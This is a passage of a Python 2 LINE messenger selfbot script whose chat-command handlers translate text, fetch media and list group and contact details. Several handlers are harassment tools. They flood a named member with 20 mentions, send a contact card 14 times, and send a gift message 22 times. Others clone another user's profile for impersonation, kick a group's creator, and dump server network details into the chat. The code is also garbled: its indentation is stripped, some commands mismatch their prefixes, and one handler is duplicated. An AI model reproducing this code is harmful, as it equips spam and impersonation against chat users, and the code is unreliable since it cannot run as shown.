cl.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Coverurl @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Getgrup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Urlgrup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendText(msg.to,path)
elif "Mycopy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybackup","mybackup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
#==============================================================================#
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Translate-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Translate-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Translate-ar" in msg.text:
isi = msg.text.replace("Tr-ar ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Translate-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Translate-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
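# The Id@en / En@id / Id@jp ... handlers below translate by scraping the mobile
# Google Translate page (translate.google.com/m) with urllib2 and cutting the text
# out of the element marked class="t0", instead of using the Translator() API above.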
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif msg.text.lower() == 'welcome':
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
tts = gTTS(text=jawaban1, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif 'Youtubemp4 ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtubemp4 ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class': 'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to, ght)
except:
cl.sendText(msg.to, "Could not find it")
elif "Youtubesearch " in msg.text:
query = msg.text.replace("Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
cl.sendText(msg.to,hasil)
print '[Command] Youtube Search'
elif "Lirik " in msg.text:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "Wikipedia " in msg.text:
try:
wiki = msg.text.lower().replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
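# "Profileig <user>" pulls the public JSON from instagram.com/<user>?__a=1 and reads
# the user fields (full_name, biography, media/follower counts, profile_pic_url_hd).
# That endpoint has historically changed or been restricted, so the except branch matters.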
elif "Profileig " in msg.text:
try:
instagram = msg.text.replace("Profileig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text in ["Kalender","Time","Waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
blan = bulan[int(bln) - 1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
#==============================================================================#
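# Server-info commands: each one shells out with subprocess.Popen and returns the
# captured stdout (ifconfig, df -h, uname -srvmpio, cat /proc/cpuinfo) to the chat.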
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif "Restart" in msg.text:
print "[Command]Restart"
try:
cl.sendText(msg.to,"Restarting...")
cl.sendText(msg.to,"Restart Success")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif "Turn off" in msg.text:
try:
import sys
sys.exit()
except:
pass
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot has been active "+waktu(eltime)
cl.sendText(msg.to,van)
#================================ PUY SCRIPT STARTED ==============================================#
elif "google " in msg.text:
a = msg.text.replace("google ","")
b = urllib.quote(a)
cl.sendText(msg.to,"Sedang Mencari om...")
cl.sendText(msg.to, "https://www.google.com/" + b)
cl.sendText(msg.to,"Ketemu om ^")
elif cms(msg.text,["/creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "ub14f769cdf42d8c8a618ebe91ac2c8c7"}
cl.sendMessage(msg)
elif "friendpp: " in msg.text:
if msg.from_ in admin:
suf = msg.text.replace('friendpp: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == suf:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Checkmid: " in msg.text:
saya = msg.text.replace("Checkmid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
cl.sendMessage(msg)
contact = cl.getContact(saya)
cu = cl.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Checkid: " in msg.text:
saya = msg.text.replace("Checkid: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).id
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
contact = cl.getContact(i)
cu = cl.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
elif "Friendpict: " in msg.text:
saya = msg.text.replace('Friendpict: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Friendlistmid"]:
gruplist = cl.getAllContactIds()
kontak = cl.getContacts(gruplist)
num=1
msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Blocklist"]:
blockedlist = cl.getBlockedContactIds()
kontak = cl.getContacts(blockedlist)
num=1
msgs="═════════List Blocked═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Gruplist"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Gruplistmid"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List GrupMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Grupimage: " in msg.text:
saya = msg.text.replace('Grupimage: ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Grupname" in msg.text:
saya = msg.text.replace('Grupname','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Grupid" in msg.text:
saya = msg.text.replace('Grupid','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif "Grupinfo: " in msg.text:
saya = msg.text.replace('Grupinfo: ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
# send the mention message 20 times (collapses 20 identical copy-pasted calls)
for _ in range(20):
    cl.sendMessage(msg)
print "Spamtag Berhasil."
elif "Spamcontact @" in msg.text:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca"}
# send the contact 14 times (collapses 14 identical copy-pasted calls; stray characters removed from the mid)
for _ in range(14):
    cl.sendMessage(msg)
cl.sendText(msg.to, "Done")
print " Spammed !"
elif "playstore " in msg.text.lower():
tob = msg.text.lower().replace("playstore ","")
cl.sendText(msg.to,"Sedang Mencari om...")
cl.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
cl.sendText(msg.to,"Ketemu om ^")
elif 'wikipedia ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=3)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Teks nya kepanjangan! ketik link dibawah aja\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "say " in msg.text.lower():
say = msg.text.lower().replace("say ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["spam gift 25"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
# send the theme gift message 22 times (collapses 22 identical copy-pasted calls)
for _ in range(22):
    cl.sendMessage(msg)
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif msg.text in ["Gcreator:kick"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.kickoutFromGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif 'lirik ' in msg.text.lower():
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "Getcover @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "idline: " in msg.text:
msgg = msg.text.replace('idline: ','')
conn = cl.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
cl.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
cl.sendMessage(msg)
elif "reinvite" in msg.text.split():
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
try:
grCans = [contact.mid for contact in group.invitee]
cl.findAndAddContactsByMids(grCans)
cl.cancelGroupInvitation(msg.to, grCans)
cl.inviteIntoGroup(msg.to, grCans)
